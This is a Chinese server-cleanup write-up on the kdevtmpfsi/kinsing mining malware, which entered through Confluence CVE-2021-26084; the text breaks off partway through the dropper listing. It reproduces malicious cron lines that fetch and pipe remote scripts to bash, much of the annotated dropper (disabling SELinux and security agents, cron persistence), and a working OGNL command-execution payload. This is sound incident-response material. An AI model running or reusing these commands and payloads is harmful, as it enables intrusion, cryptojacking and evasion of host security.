清理挖矿病毒kthreaddi


cpu持续繁忙,使用top命令查看

top - 09:55:44 up 11:39,  2 users,  load average: 2.48, 2.95, 3.45
Tasks: 135 total,   1 running, 134 sleeping,   0 stopped,   0 zombie
%Cpu(s): 51.9 us,  6.8 sy,  0.0 ni, 40.3 id,  0.0 wa,  0.0 hi,  1.0 si,  0.0 st
KiB Mem :  7898900 total,  3735748 free,  3614008 used,   549144 buff/cache
KiB Swap:  6254588 total,  4140812 free,  2113776 used.  3984796 avail Mem

  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
16679 root      20   0  162016   2400   1644 R   1.3  0.0   0:00.09 top
 2383 root      20   0 5768156 147064   1268 S   0.7  1.9   6:23.06 java
 4500 root      20   0  113204   1480   1204 S   0.7  0.0   0:02.51 sh
 9988 root      20   0 4753612 292844   5984 S   0.7  3.7  13:14.51 java
    9 root      20   0       0      0      0 S   0.3  0.0   1:31.22 rcu_sched
 2469 apache    20   0 2894752  53204   3900 S   0.3  0.7   0:23.69 httpd
 9122 root      20   0       0      0      0 S   0.3  0.0   0:00.12 kworker/u8:2
12914 root      20   0   26840    192    120 S   0.3  0.0   0:10.05 quu
    1 root      20   0  193900   5072   3156 S   0.0  0.1   0:52.04 systemd
    2 root      20   0       0      0      0 S   0.0  0.0   0:00.08 kthreadd
    3 root      20   0       0      0      0 S   0.0  0.0   0:00.99 ksoftirqd/0
    5 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 kworker/0:0H
    7 root      rt   0       0      0      0 S   0.0  0.0   0:01.45 migration/0
    8 root      20   0       0      0      0 S   0.0  0.0   0:00.00 rcu_bh
   12 root      rt   0       0      0      0 S   0.0  0.0   0:04.27 migration/1
   13 root      20   0       0      0      0 S   0.0  0.0   0:07.48 ksoftirqd/1
   15 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 kworker/1:0H
   17 root      rt   0       0      0      0 S   0.0  0.0   0:01.42 migration/2
   18 root      20   0       0      0      0 S   0.0  0.0   0:00.95 ksoftirqd/2
   20 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 kworker/2:0H
   22 root      rt   0       0      0      0 S   0.0  0.0   0:04.21 migration/3
   23 root      20   0       0      0      0 S   0.0  0.0   0:07.62 ksoftirqd/3
   25 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 kworker/3:0H
   27 root      20   0       0      0      0 S   0.0  0.0   0:00.00 kdevtmpfs
   28 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 netns
   29 root      20   0       0      0      0 S   0.0  0.0   0:00.05 khungtaskd
   30 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 writeback
   31 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 kintegrityd
   32 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 bioset
   33 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 kblockd
   34 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 md
   42 root      20   0       0      0      0 S   0.0  0.0   0:21.48 kswapd0
   43 root      25   5       0      0      0 S   0.0  0.0   0:00.00 ksmd
   44 root      39  19       0      0      0 S   0.0  0.0   0:01.42 khugepaged
   45 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 crypto
   53 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 kthrotld

发现有很多kworker、kthreadd等以k开头的进程,单个进程的cpu占用都不高,但整体cpu占用较高。上面的输出中包含一个sh进程,是我写的循环kill可疑进程的脚本,如下

clean.sh
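# clean.sh: stopgap watchdog used while the persistence is being removed.
# Once a second, SIGKILL every process whose command line matches one of the
# names the miner has been seen using on this host. Killing by name only buys
# time — the binary is re-dropped by cron/systemd and can simply be renamed —
# so the cron entries, the .service units and the dropped files still have
# to be removed for the cleanup to stick.
patterns='kdevtmpfsi ksoftirqd kthreadd kworker solrd solr.sh syne'
##patterns="$patterns synsi"
while true
do
  for p in $patterns
  do
    # xargs -r: skip the kill entirely when nothing matched, instead of
    # printing a "kill: usage" error every second
    ps -ef | grep -- "$p" | grep -v grep | awk '{print $2}' | xargs -r kill -9
  done
  sleep 1
done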

通过下面的命令让脚本在后台运行,每1秒清理一次可疑进程

nohup sh clean.sh &

很明显上面的top命令已经被劫持,输出的不是真实的进程列表。改用busybox工具查看(静态链接的busybox一般不受预加载库劫持的影响,因此能看到真实进程),结果如下

root@192.168.1.3:bin ./busybox top
Mem: 4246580K used, 3652320K free, 8696K shrd, 36K buff, 458100K cached
CPU:  50% usr   0% sys   0% nic  50% idle   0% io   0% irq   0% sirq
Load average: 2.60 2.72 3.24 3/718 25512
  PID  PPID USER     STAT   VSZ %VSZ CPU %CPU COMMAND
10725     1 root     S    2673m  34%   3  48% /tmp/kdevtmpfsi
 9988     1 root     S     546m   7%   0   2% /usr/bin/java -Djava.util.logging.config.file=/home/web/bitbucket/bitbucket-4.14.4/instance/conf/logging.properties -Djava.util
 2469  2285 apache   S    2826m  36%   2   0% /usr/sbin/httpd -DFOREGROUND
 5431  2285 apache   S    2650m  34%   2   0% /usr/sbin/httpd -DFOREGROUND
 2471  2285 apache   S    2648m  34%   2   0% /usr/sbin/httpd -DFOREGROUND
 2470  2285 apache   S    2630m  33%   1   0% /usr/sbin/httpd -DFOREGROUND
32402     1 mysql    S    1604m  20%   3   0% /usr/sbin/mysqld --daemonize --pid-file=/var/run/mysqld/mysqld.pid
 2383     1 root     S    1536m  20%   0   0% /usr/bin/java -Djava.util.logging.config.file=/home/web/apache-tomcat-8.0.53/conf/logging.properties -Djava.util.logging.manage
 2315     1 root     S     920m  12%   3   0% node /home/web/linux-dash/app/server/index.js
 3259     1 root     S     784m  10%   0   0% /home/web/frp_0.25.1_linux_386/frpc -c /home/web/frp_0.25.1_linux_386/frpc.ini
27030     1 root     S     701m   9%   3   0% /etc/kinsing
 2287     1 root     S     551m   7%   3   0% {tuned} /usr/bin/python -Es /usr/sbin/tuned -l -P
  837     1 root     S     542m   7%   1   0% /usr/sbin/NetworkManager --no-daemon
  838     1 polkitd  S     526m   7%   1   0% /usr/lib/polkit-1/polkitd --no-debug
 2300     1 root     S     522m   7%   3   0% {fail2ban-server} /usr/bin/python -s /usr/bin/fail2ban-server -xf start
 2285     1 root     S     386m   5%   3   0% /usr/sbin/httpd -DFOREGROUND
20801     1 root     S     330m   4%   2   0% {firewalld} /usr/bin/python -Es /usr/sbin/firewalld --nofork --nopid
 2434  2285 apache   S     287m   4%   0   0% /usr/sbin/httpd -DFOREGROUND
  834     1 root     S     258m   3%   3   0% /usr/sbin/rsyslogd -n
  516     1 root     S     192m   2%   1   0% /usr/sbin/lvmetad -f
    1     0 root     S     189m   2%   3   0% /usr/lib/systemd/systemd --switched-root --system --deserialize 21
28238  8983 root     S     148m   2%   1   0% sshd: root@pts/1
20524  8983 root     S     148m   2%   1   0% sshd: root@pts/0
  881   837 root     S     112m   1%   3   0% /sbin/dhclient -d -q -sf /usr/libexec/nm-dhcp-helper -pf /var/run/dhclient-enp1s0.pid -lf /var/lib/NetworkManager/dhclient-9021
28571 28238 root     S     112m   1%   3   0% -bash
20844 20524 root     S     112m   1%   3   0% -bash
 4500 28571 root     S     110m   1%   3   0% sh clean.sh
 8983     1 root     S     107m   1%   1   0% /usr/sbin/sshd -D
 8990     1 root     S     107m   1%   1   0% /sbin/agetty --noclear tty1 linux
25511  4500 root     S     107m   1%   3   0% sleep 1
  825     1 dbus     S    98356   1%   1   0% /bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
  499     1 root     S    92216   1%   1   0% /usr/lib/systemd/systemd-journald
 2347     1 root     S    88780   1%   1   0% sendmail: accepting connections
 2403     1 smmsp    S    84216   1%   3   0% sendmail: Queue runner@01:00:00 for /var/spool/clientmqueue
30637     1 root     S    76272   1%   1   0% /usr/bin/bsd-port/getty
  797     1 root     S<   55508   1%   1   0% /sbin/auditd
  880     1 root     S    54628   1%   3   0% /usr/sbin/wpa_supplicant -u -f /var/log/wpa_supplicant.log -c /etc/wpa_supplicant/wpa_supplicant.conf -P /var/run/wpa_supplican
  527     1 root     S    46924   1%   0   0% /usr/lib/systemd/systemd-udevd
12914     1 root     S    26840   0%   1   0% ./quu

此时看到的才是真实的进程信息,可以看到/tmp/kdevtmpfsi这个进程占用了34%的cpu,如果我的1秒循环kill脚本不运行,cpu会被这个进程占满

#查看定时任务

root@192.168.1.3:bin crontab -l
*/30 * * * *	(curl -fsSL http://bash.givemexyz.in/xms||wget -q -O- http://bash.givemexyz.in/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("http://bash.givemexyz.in/xms").read()')| bash -sh; lwp-download http://bash.givemexyz.in/xms /xms; bash /xms; /xms; rm -rf /xms
##
root@192.168.1.3:bin ./busybox crontab -l
* * * * *	(curl -fsSL http://bash.givemexyz.in/xms||wget -q -O- http://bash.givemexyz.in/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("http://bash.givemexyz.in/xms").read()')| bash -sh; lwp-download http://bash.givemexyz.in/xms /xms; bash /xms; /xms; rm -rf /xms
##

删除定时任务

root@192.168.1.3:bin sudo crontab -e
crontab: installing new crontab
crontab: error renaming /var/spool/cron/#tmp.192.168.1.3.XXXXnIIKfP to /var/spool/cron/root
rename: Operation not permitted
crontab: edits left in /tmp/crontab.vjquzF

查看tmp目录

root@192.168.1.3:tmp ls -alh
total 1.4M
drwxrwxrwt. 22 root root 4.0K Sep 15 10:07 .
dr-xr-xr-x. 19 root root  284 Sep 14 22:18 ..
drwxrwxrwx.  2 root root    6 Sep 14 14:13 20210914_141323-scantem.b7c6bffbc6
drwxrwxrwx.  3 root root   32 Sep 14 14:13 20210914_141343-scantem.787984624c
-rwxrwxrwx.  1 root root 185K Sep 15 09:29 bashirc
-rw-r-----.  1 root root   73 Sep 15 09:47 conf.n
-rw-------.  1 root root    0 Sep 15 10:07 crontab.TPgC6E
-rw-------.  1 root root    0 Sep 15 10:07 crontab.vjquzF
drwxrwxrwx.  2 root root    6 Sep 14 09:10 dbusex
drwxrwxrwt.  2 root root    6 Mar 17  2019 .font-unix
-rwxr-x---.  1 root root    5 Sep 15 09:47 gates.lod
drwxrwxrwx.  2 root root    6 Sep 14 09:10 go
drwxrwxrwx.  2 root root    6 Sep 14 14:27 hsperfdata_root
drwxrwxrwx.  2 root root    6 Sep 14 09:10 i686
drwxr-x---.  2 root root   18 Sep 15 09:53 .ICEd-unix
drwxrwxrwt.  2 root root    6 Mar 17  2019 .ICE-unix
drwxrwxrwx.  2 root root    6 Sep 14 09:10 kingsing
-rw-r-----.  1 root root    0 Sep 15 09:29 .lock
-rwxr-x---.  1 root root    5 Sep 15 09:47 moni.lod
-rw-r-----.  1 root root    0 Sep 15 09:29 .python
drwxr-x---.  2 root root   38 Sep 15 08:38 .solr
-rwxr-x---.  1 root root 1.2M Sep 15 09:52 syne
drwxrwxrwx.  3 root root   17 Sep 14 22:16 systemd-private-02708b92c60147c38cdd949508165110-httpd.service-qDd0WP
drwxrwxrwx.  3 root root   17 Sep 11 21:15 systemd-private-f0162dc1f43c45209dbacffcab0dfd9c-httpd.service-GSWGjC
drwxrwxrwt.  2 root root    6 Mar 17  2019 .Test-unix
drwxrwxrwt.  2 root root    6 Mar 17  2019 .X11-unix
drwxrwxrwx.  2 root root    6 Sep 14 09:10 x64b
drwxrwxrwx.  2 root root    6 Sep 14 09:10 x86_64
drwxrwxrwx.  2 root root    6 Sep 14 09:10 x86_643
drwxrwxrwt.  2 root root    6 Mar 17  2019 .XIM-unix
drwxrwxrwx.  2 root root    6 Sep 14 09:10 zzz

编辑hosts文件添加如下内容,把下载域名指向本机,阻断定时任务继续拉取脚本

127.0.0.1 bash.givemexyz.in

删除定时任务

root@192.168.1.3:cron sudo rm -rf root
rm: cannot remove ‘root’: Operation not permitted
root@192.168.1.3:cron chattr -i -a root
root@192.168.1.3:cron ls -alhtr
total 4.0K
drwxr-xr-x. 11 root root 139 Sep 14 13:13 ..
-rw-------.  1 root root 280 Sep 15 09:33 root
drwxr-x---.  2 root root  18 Sep 15 10:14 crontabs
drwx------.  3 root root  34 Sep 15 10:14 .
root@192.168.1.3:cron rm -rf root

root@192.168.1.3:cron rm -rf crontabs
rm: cannot remove ‘crontabs/root’: Operation not permitted
root@192.168.1.3:cron cd crontabs/
root@192.168.1.3:crontabs ls
root
root@192.168.1.3:crontabs ls -alhtr
total 4.0K
-rw-r-----. 1 root root 277 Sep 15 09:33 root
drwxr-x---. 2 root root  18 Sep 15 10:14 .
drwx------. 3 root root  22 Sep 15 10:22 ..
root@192.168.1.3:crontabs rm -rf root
rm: cannot remove ‘root’: Operation not permitted
root@192.168.1.3:crontabs chattr -i -a root
root@192.168.1.3:crontabs rm -rf root


root@192.168.1.3:/ rm -rf tmp/
rm: cannot remove ‘tmp/’: Device or resource busy
root@192.168.1.3:/ busybox lsof|grep tmp
2287	/usr/bin/python2.7	/tmp/ffidZH0PZ (deleted)
5638	/usr/bin/.sshd (deleted)	/tmp/moni.lod (deleted)
12914	/tmp/quu (deleted)	socket:[5967920]
19465	/etc/kinsing	/tmp/.ICEd-unix/971706110 (deleted)
20801	/usr/bin/python2.7	/tmp/ffiUKjXj4 (deleted)
25185	/tmp/kdevtmpfsi	/dev/null
25185	/tmp/kdevtmpfsi	/tmp/.ICEd-unix/971706110 (deleted)
25185	/tmp/kdevtmpfsi	/tmp/.ICEd-unix/971706110 (deleted)
25185	/tmp/kdevtmpfsi	/
25185	/tmp/kdevtmpfsi	pipe:[9432437]
25185	/tmp/kdevtmpfsi	pipe:[9432437]
25185	/tmp/kdevtmpfsi	anon_inode:[eventpoll]
25185	/tmp/kdevtmpfsi	pipe:[9432438]
25185	/tmp/kdevtmpfsi	pipe:[9432438]
25185	/tmp/kdevtmpfsi	anon_inode:[eventfd]
25185	/tmp/kdevtmpfsi	/dev/null
25185	/tmp/kdevtmpfsi	socket:[9433873]
26065	/usr/bin/bash	/tmp/.ICEd-unix/HgfNa
27264	/tmp/bashirc (deleted)	pipe:[8576625]
27264	/tmp/bashirc (deleted)	pipe:[8576621]
27264	/tmp/bashirc (deleted)	pipe:[8576621]
27264	/tmp/bashirc (deleted)	/tmp/.python (deleted)
27264	/tmp/bashirc (deleted)	socket:[8586904]
32402	/usr/sbin/mysqld	/tmp/ibqHHsxk (deleted)
32402	/usr/sbin/mysqld	/tmp/ibiIidip (deleted)
32402	/usr/sbin/mysqld	/tmp/ibEOcZ2t (deleted)
32402	/usr/sbin/mysqld	/tmp/ib0JR2CD (deleted)
32402	/usr/sbin/mysqld	/var/lib/mysql/ibtmp1
32402	/usr/sbin/mysqld	/tmp/ibKSW5QI (deleted)

参考https://bbs.huaweicloud.com/blogs/202738,找到kinsing的启动配置位置

root@192.168.1.3:system grep -r kinsing /usr/lib/systemd/system
/usr/lib/systemd/system/bot.service:ExecStart=/etc/kinsing

查看对应目录文件

root@192.168.1.3:system ls -alhtr
total 924K. ---省略若干时间很早的文件,只看最近几天的文件
-rw-r--r--.  1 root root  397 Aug 29 09:43 clamav-freshclam.service
-rw-r--r--.  1 root root  527 Aug 29 09:43 clamav-clamonacc.service
lrwxrwxrwx.  1 root root   24 Sep 14 13:13 clamonacc.service -> clamav-clamonacc.service
-rw-r-----.  1 root root  328 Sep 15 09:30 pwnrigl.service
drwxr-xr-x. 28 root root  12K Sep 15 09:30 .
-rw-r-----.  1 root root  193 Sep 15 12:43 bot.service

问题锁定在bot.service和pwnrigl.service这两个文件中

root@192.168.1.3:system cat bot.service
[Unit]
Description=Start daemon at boot time
After=
Requires=
[Service]
Type=forking
RestartSec=10s
Restart=always
TimeoutStartSec=5
ExecStart=/etc/kinsing
[Install]
WantedBy=multi-user.target

root@192.168.1.3:system cat pwnrigl.service
[Unit]
Description=pwnrig

Wants=network.target
After=syslog.target network-online.target

[Service]
Type=forking
ExecStart=/bin/bash -c 'cp -f -r -- /bin/sysdr /bin/dbused 2>/dev/null && /bin/dbused -c  >/dev/null 2>&1 && rm -rf -- /bin/dbused 2>/dev/null'
Restart=always
KillMode=process

[Install]
WantedBy=multi-user.target

删除
root@192.168.1.3:system rm -rf pwnrigl.service bot.service
rm: cannot remove ‘pwnrigl.service’: Operation not permitted
root@192.168.1.3:system chattr -i -a pwnrigl.service
root@192.168.1.3:system rm -rf pwnrigl.service


禁止访问对应ip 209.141.40.190(下文的xms脚本在域名不可达时会回退到这个ip,所以仅修改hosts并不够)

root@192.168.1.3:redis-5.0.5 ping 209.141.40.190
PING 209.141.40.190 (209.141.40.190) 56(84) bytes of data.
64 bytes from 209.141.40.190: icmp_seq=1 ttl=51 time=219 ms
64 bytes from 209.141.40.190: icmp_seq=2 ttl=51 time=224 ms
64 bytes from 209.141.40.190: icmp_seq=3 ttl=51 time=202 ms
^C
--- 209.141.40.190 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 202.919/215.587/224.464/9.211 ms
root@192.168.1.3:redis-5.0.5 iptables -A OUTPUT -d 209.141.40.190 -j REJECT
root@192.168.1.3:redis-5.0.5 ping 209.141.40.190
PING 209.141.40.190 (209.141.40.190) 56(84) bytes of data.
From 192.168.1.3 icmp_seq=1 Destination Port Unreachable
ping: sendmsg: Operation not permitted
From 192.168.1.3 icmp_seq=2 Destination Port Unreachable

参考如下文章,定位到病毒是利用Confluence的OGNL注入漏洞(CVE-2021-26084)植入的

https://blog.csdn.net/weixin_39997829/article/details/120179000

https://github.com/h3v0x/CVE-2021-26084_Confluence/blob/main/Confluence_OGNLInjection.py

下面是Confluence低版本可以被注入、以及升级Confluence版本后无法再注入的对比示例

可以看到漏洞未修复时,可以直接执行pwd命令并正确输出执行结果,这样任何脚本都能注入到服务器中执行,危害极大。

漏洞修复后无法执行shell命令。

centos7_20G@192.168.1.8:home python3 test.py -u http://127.0.0.1:8090
---------------------------------------------------------------
[-] Confluence Server Webwork OGNL injection
[-] CVE-2021-26084
[-] https://github.com/h3v0x
---------------------------------------------------------------

> pwd
aaaaaaaa[/home/web/confluence/confluence-6.13.2/atlassian-confluence-6.13.2/bin
]
>
修复之后
centos7_20G@192.168.1.8:home python3 test.py -u http://192.168.1.9:8090
---------------------------------------------------------------
[-] Confluence Server Webwork OGNL injection
[-] CVE-2021-26084
[-] https://github.com/h3v0x
---------------------------------------------------------------

> pwd
aaaaaaaa\u0027+{Class.forName(\u0027javax.script.ScriptEngineManager\u0027).newInstance().getEngineByName(\u0027JavaScript\u0027).\u0065val(\u0027var isWin = java.lang.System.getProperty(\u0022os.name\u0022).toLowerCase().contains(\u0022win\u0022); var cmd = new java.lang.String(\u0022pwd\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\u0022cmd.exe\u0022, \u0022/c\u0022, cmd); } else{p.command(\u0022bash\u0022, \u0022-c\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \u0022\u0022; var output = \u0022\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\u0027)}+\u0027

下载问题脚本,阅读脚本内容可以看到它具体都做了什么

wget http://bash.givemexyz.in/xms

#!/bin/bash
# --- Captured dropper ("xms"), annotated for analysis only; never execute. ---
# Stage 1: weaken the host. Disables SELinux enforcement, raises the per-user
# process limit and sets vm.nr_hugepages to 3x the CPU count (large-page
# tuning, presumably for the payload started later — inferred, not shown).
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
setenforce 0 2>/dev/null
ulimit -u 50000
sysctl -w vm.nr_hugepages=$((`grep -c processor /proc/cpuinfo` * 3))
# Stage 2: evict competitors. Every process holding a socket on one of these
# ports, or connected to one of the three listed peers, is SIGKILLed.
netstat -antp | grep ':3333'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':4444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':5555'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':7777'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':14444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':5790'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':45700'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':2222'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':9999'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':20580'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':13531'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '23.94.24.12:8080'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs kill -9
netstat -antp | grep '134.122.17.13:8080'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs kill -9
netstat -antp | grep '107.189.11.170:443'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs kill -9
# Both values are computed but never referenced anywhere in this listing.
rand=$(seq 0 255 | sort -R | head -n1)
rand2=$(seq 0 255 | sort -R | head -n1)
# Strips the immutable/append-only attributes that the script re-applies at
# the very end ('chattr +ai' on the same paths) so its persistence files can
# be rewritten. This is why plain 'rm' on the crontab files failed during
# cleanup until 'chattr -i -a' was run first.
chattr -i -a /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down

# Stage 3: remove cloud host-security agents. If an Aliyun ('aliyun') or
# Tencent YunJing ('yunjing') process is running, fetches and runs the vendor
# uninstall scripts, deletes the agent files and stops/removes bcm-agent.
if ps aux | grep -i '[a]liyun'; then
  (wget -q -O - http://update.aegis.aliyun.com/download/uninstall.sh||curl -s http://update.aegis.aliyun.com/download/uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
  (wget -q -O - http://update.aegis.aliyun.com/download/quartz_uninstall.sh||curl -s http://update.aegis.aliyun.com/download/quartz_uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/quartz_uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
  pkill aliyun-service
  rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
  rm -rf /usr/local/aegis*
  systemctl stop aliyun.service
  systemctl disable aliyun.service
  service bcm-agent stop
  yum remove bcm-agent -y
  apt-get remove bcm-agent -y
elif ps aux | grep -i '[y]unjing'; then
  /usr/local/qcloud/stargate/admin/uninstall.sh
  /usr/local/qcloud/YunJing/uninst.sh
  /usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi
sleep 1
echo "DER Uninstalled"

chattr -ai /tmp/dbused

# 'range' = first two octets of the first non-loopback IPv4 address. It is not
# referenced anywhere else in this listing.
if [ -s /usr/bin/ifconfig ];
then
	range=$(ifconfig | grep "BROADCAST\|inet" | grep -oP 'inet\s+\K\d{1,3}\.\d{1,3}' | grep -v 127 | grep -v inet6 |grep -v 255 | head -n1)
else
	range=$(ip a | grep "BROADCAST\|inet" | grep -oP 'inet\s+\K\d{1,3}\.\d{1,3}' | grep -v 127 | grep -v inet6 |grep -v 255 | head -n1)
fi

# If the mining-pool host pool.supportxmr.com answers a ping, 'dns' stays
# empty; otherwise the payload is later started with '-d' (see judge()).
# What '-d' means to the binary is not visible here.
if [ $(ping -c 1 pool.supportxmr.com 2>/dev/null|grep "bytes of data" | wc -l ) -gt '0' ];
then
        dns=""
else
        dns="-d"
fi

# Download base: the domain when it is reachable, else the hard-coded IP.
# A hosts-file sinkhole of the domain alone therefore does not stop
# re-infection; the IP has to be blocked as well (done with iptables above).
if [ $(ping -c 1 bash.givemexyz.in 2>/dev/null|grep "bytes of data" | wc -l ) -gt '0' ];
then
        url="http://bash.givemexyz.in"
else
        url="http://209.141.40.190"
fi


# Stage 4: persistence in six cron locations (/etc/cron.d/{root,apache,nginx},
# both crontab spool paths and /etc/cron.hourly/oanacroner1), re-running the
# download-and-execute chain every 1, 2, 3 or 30 minutes, or hourly.
# NOTE: $DIR is only assigned further down, so here it expands to nothing and
# the entries use '/xms' — exactly the 'lwp-download ... /xms; bash /xms'
# crontab shown earlier in this writeup.
echo -e "*/1 * * * * root (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /etc/cron.d/root
echo -e "*/2 * * * * root (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /etc/cron.d/apache
echo -e "*/3 * * * * root (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /etc/cron.d/nginx
echo -e "*/30 * * * *	(curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "* * * * *	(curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /var/spool/cron/crontabs/root
mkdir -p /etc/cron.hourly
echo "(curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/cron.hourly/oanacroner1

# Working directory selection: /tmp, unless /tmp/dbused exists but is not a
# writable regular file, in which case a fresh mktemp directory is used.
DIR="/tmp"
cd $DIR

if [ -a "/tmp/dbused" ]
then
    if [ -w "/tmp/dbused" ] && [ ! -d "/tmp/dbused" ]
    then
        if [ -x "$(command -v md5sum)" ]
        then
            # Known-good payload hashes. Any other file at this path is treated
            # as a rival implant: its preloaded library is deleted,
            # /etc/ld.so.preload is emptied and its processes are killed.
            # (/etc/ld.so.preload is worth checking on any host whose
            # top/ps output looks wrong, as it did at the start of this writeup.)
            sum=$(md5sum /tmp/dbused | awk '{ print $1 }')
            echo $sum
            case $sum in
                dc3d2e17df6cef8df41ce8b0eba99291 | 101ce170dafe1d352680ce0934bfb37e)
                    echo "x86_64 OK"
                ;;
                *)
                    echo "x86_64 wrong"
                    rm -rf /usr/local/lib/libkk.so
                    echo "" > /etc/ld.so.preload
                    pkill -f wc.conf
                    pkill -f susss
                    sleep 4
                ;;
            esac
        fi
        echo "P OK"
    else
        DIR=$(mktemp -d)/tmp
        mkdir $DIR
        echo "T DIR $DIR"
    fi
else
    if [ -d "/tmp" ]
    then
        DIR="/tmp"
    fi
    echo "P NOT EXISTS"
fi
if [ -d "/tmp/.sh/dbused" ]
then
    DIR=$(mktemp -d)/tmp
    mkdir $DIR
    echo "T DIR $DIR"
fi

get() {
  # get URL DEST: unlocks and removes DEST, then downloads URL into it with
  # wget, curl or lwp-download. Because the third alternative also ends in
  # '||', 'chmod +x' only runs when all three downloads have failed; the
  # callers that need an executable (judge() and the bashirc block) chmod
  # the file themselves.
  chattr -i $2; rm -rf $2
  wget -q -O - $1 > $2 || curl -fsSL $1 -o $2 ||  lwp-download $1 $2 ||
  chmod +x $2
}


downloadIfNeed()
{
    # Re-download path keyed on the md5 of $DIR/dbused; on a mismatch it calls
    # download (defined below) and logs before/after sizes to $DIR/tmp.txt.
    # Not called anywhere in this listing. 'WGET' is assigned but never used,
    # and $DIR/x86_64 / $DIR/sssus are only read for the log line.
    if [ -x "$(command -v md5sum)" ]
    then
        if [ ! -f $DIR/dbused ]; then
            echo "File not found!"
            download
        fi
        sum=$(md5sum $DIR/dbused | awk '{ print $1 }')
        echo $sum
        case $sum in
            dc3d2e17df6cef8df41ce8b0eba99291 | 101ce170dafe1d352680ce0934bfb37e)
                echo "x86_64 OK"
            ;;
            *)
                echo "x86_64 wrong"
                sizeBefore=$(du $DIR/x86_64)
                if [ -s /usr/bin/curl ];
                then
                    WGET="curl -k -o ";
                fi
                if [ -s /usr/bin/wget ];
                then
                    WGET="wget --no-check-certificate -O ";
                fi
                download
                sumAfter=$(md5sum $DIR/x86_64 | awk '{ print $1 }')
                if [ -s /usr/bin/curl ];
                then
                    echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/sssus` > $DIR/tmp.txt
                fi
            ;;
        esac
    else
        echo "No md5sum"
        download
    fi
}


download() {
    # Reuses the cached copy $DIR/x86_643 as $DIR/x86_64 when its md5 matches
    # (both case alternatives are the same hash and the 'cp' is duplicated);
    # otherwise, or when md5sum is missing, falls back to a network fetch via
    # download2.
    if [ -x "$(command -v md5sum)" ]
    then
        sum=$(md5sum $DIR/x86_643 | awk '{ print $1 }')
        echo $sum
        case $sum in
            dc3d2e17df6cef8df41ce8b0eba99291 | dc3d2e17df6cef8df41ce8b0eba99291)
                echo "x86_64 OK"
                cp $DIR/x86_643 $DIR/x86_64
